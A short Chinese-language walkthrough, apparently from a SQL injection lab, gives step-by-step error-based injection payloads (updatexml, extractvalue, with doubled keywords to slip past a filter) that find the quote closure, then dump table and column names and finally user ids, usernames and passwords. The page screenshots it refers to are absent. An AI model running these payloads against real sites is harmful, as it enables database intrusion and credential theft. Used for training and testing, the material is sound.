1、判断闭合方式
输入语句
?id=1\;%00
,返回页面如下:
'号可能是闭合方式。
我们输入
?id=1';%00
,返回页面如下
我们可以确定'号就是该网站的闭合符号。
2、确定数据库名的长度
输入语句
?id=1'%26%26length(database())=8;%00
,返回页面如下:
3、爆破数据表名
输入语句
?id=1'||updatexml(1,concat('~',(select+(group_concat(table_name))from+(infoorrmation_schema.tables)+where+(table_schema=database())),'~'),1);%00
,返回页面如下:
4、爆破列名
输入语句
?id=1'%26%26extractvalue(1,concat('~',(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='users')aandnd(table_schema=database())),'~'));%00
,返回页面如下:
5、爆破字段内容
输入语句
?id=1'%26%26updatexml(1,concat('~',(select (group_concat(concat(id,'~',username,'~',password))) from (users)),'~'),1);%00
,返回页面如下:
我们发现返回的内容不完全,我们将语句改为:?
id=1'%26%26updatexml(1,concat('~',mid((select (group_concat(concat(id,'~',username,'~',passwoorrd))) from (users)),10,22),'~'),1);%00
,返回页面如下: